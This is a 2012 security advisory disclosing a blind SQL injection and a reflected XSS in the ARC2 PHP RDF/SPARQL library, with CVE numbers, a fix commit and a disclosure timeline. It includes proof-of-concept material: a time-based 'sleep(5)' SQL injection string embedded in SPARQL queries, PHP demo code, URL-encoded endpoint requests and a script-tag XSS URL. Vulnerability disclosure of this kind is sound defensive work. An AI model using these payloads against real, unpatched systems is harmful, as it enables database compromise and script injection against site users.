ush.it - a beautiful place

ARC v2011-12-01 Multiple vulnerabilities

November 22, 2012 at 11:34 am - Filed under Hacks - 1408 words, reading time ~4 minutes - Permalink - Comments

Simone "negator" Onofri and Luca "beinux3" Napolitano found multiple issues in ARC2, providing RDF and SPARQL functionalities to PHP applications and working with MySQL as backend. Found vulnerabilities include SQL Injection and XSS.

ARC v2011-12-01 Multiple vulnerabilities

 Name              ARC2 v2011-12-01 Multiple vulnerabilities
 Systems Affected  ARC2 v2011-12-01
 Severity          High
 Impact            High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C)
 Vendor            https://github.com/semsol/arc2
 Advisory          http://www.ush.it/team/negator/hack-arc_2011-12-01/adv.txt
 Author            Simone "negator" Onofri, Luca "beinux3" Napolitano
 Date              20121123

I. BACKGROUND

ARC is a flexible RDF system for semantic web and PHP practitioners. 
It's free, open-source, easy to use, and runs in most web server 
environments.

II. DESCRIPTION

ARC version v2011-12-01 and lower is affected by Blind SQL Injection and
Cross Site Scripting vulnerabilities, in particular the SPARQL+ 
Endpoint.

III. ANALYSIS

Summary:
       A) Blind SQL Injection (SQLI) Vulnerability 
       B) Reflected Cross Site Scripting (XSS) Vulnerability

A) Blind SQL Injection (SQLI) Vulnerability

A blind SQL Injection vulnerability exists in ARC version v2011-12-01.

ARC stores triples into a mySQL database and uses a translator from 
SPARQL and SQL. To improve debugging of the application the developer 
has included comments that contain the query string value. It's possible
to Inject SQL commands on these comments if data passed is into a SPARQL
WHERE clause.

In the "getTriplePatternSQL()" function, "ARC2_StoreSelectQueryHandler
.php" file, the query sent to MySQL is automatically debugged (without 
the ability to conditionally disable such feature) plugging comments 
containing the pattern's "S P O" (Subject, Predicate, Object; the 
semantic web triple concept) values.

SPARQL Query:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PREFIX iam: <http://x>
SELECT * WHERE {
   ?user iam:user "lol*/ OR (SELECT sleep(5))=1--" . 
}
LIMIT 100


--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Actual MySQL Query:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

SELECT
  T_0_0_0.s AS `user`, 
    T_0_0_0.s_type AS `user type`
FROM arc_tests_triple T_0_0_0
WHERE (T_0_0_0.p = 0) /*FIX-IT http://xuser */
  AND (T_0_0_0.o = 0) /*FIX-IT lol*/ OR (SELECT sleep(5))=1-- */
LIMIT 0,100


--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

What follows is a demo exploitation of the SPARQL Endpoint.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$query = 'PREFIX iam: <http://x>
 SELECT * WHERE {
  ?user iam:user "lol*/ OR (SELECT sleep(5))=1--".?password iam:hasPassw
  ord "password" .
 } LIMIT 100';
$store->setUp();
$store->query($query, 'rows')

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

It's possible to exploit the issue in the standard blind way, for
example using TRUE/FALSE statements (tautology).

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/end_point.php?query=PREFIX+iam%3A+<http%3A%2F%2Fx
>%0D%0ASELECT+*+WHERE+%7B%0D%0A+++%3Fuser+iam%3Auser+"lol*%2F+OR+%28SELE
CT+sleep%285%29%29%3D1--".%0D%0A%7D%0D%0ALIMIT+1&output=&jsonp=&key=&sho
w_inline=1

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The CVSS v2 score for Blind SQL Injection is: High 10/10, vector 
(AV:N/AC:L/Au:N/C:C/I:C/A:C).

B) Reflected Cross Site Scripting (XSS) Vulnerability

A Reflected Cross Site Scripting vulnerability exists in ARC version 
v2011-12-01 endpoint function.

The GET variable "query" is reflected in page without proper encoding 
when the "output" option is set to "htmltab".

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

<div class="results">
 Could not properly handle "<script src=/lol.it/x><script>" in 
 ARC2_SPARQLPlusParser
</div>

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PoC URL that exploits this vulnerability:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/end_point.php?query=<script+src%3D%2Flol.it%2Fx><
script>&output=htmltab&jsonp=&key=&show_inline=1

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The CVSS v2 score for Reflected Cross Site Scripting is Medium 4.3/10, 
vector (AV:N/AC:M/Au:N/C:N/I:P/A:N).

IV. DETECTION

ARC2 v2011-12-01 and possibly earlier versions are vulnerable.

V. WORKAROUND

Update ARC2 to the latest release or manually fix the "ARC2_StoreEndpoin
t.php" and other files as described by the commit ID 0a39922edaf6a72c5af
60aaeaff7bc4e92a6d342.

https://github.com/semsol/arc2/commit/0a39922edaf6a72c5af60aaeaff7bc4e92a6d342

VI. VENDOR RESPONSE

Issues fixed in GIT commit 0a39922.
 
VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned:
 - The name CVE-2012-5872 to Blind SQL Injection Vulnerability. 
 - The name CVE-2012-5873 to Reflected Cross Site Scripting 
   Vulnerability.

This is a candidate for inclusion in the CVE list http://cve.mitre.org, 
which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

20121110 Bug discovered
20121110 Vendor contacted
20121111 Vendor responded
20121111 Vendor fixed SQLI
20121115 Vendor fixed XSS
20121115 Advisory release scheduled for 20121123
20121123 Advisory released

IX. REFERENCES

Well you know what SQLi and XSS are, right?

X. CREDIT

Simone "negator" Onofri is credited for the discovery of this
vulnerability.

Luca "beinux3" Napolitano is credited for the discovery of this
vulnerability.

Thanks to Francesco "ascii" Ongaro for revision and fine editing.

Simone "negator" Onofri
web site: http://simone.onofri.net/
mail: simone AT onofri DOT net

Luca "beinux3" Napolitano
web site:http://www.network-tsunami.com/
mail: beinux3 AT gmail DOT com

Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

XI. LEGAL NOTICES

Copyright (c) 2012 

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate 
at the time of publishing based on currently available information. Use 
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, 
this information.
THP USH Wisec DigitalBullets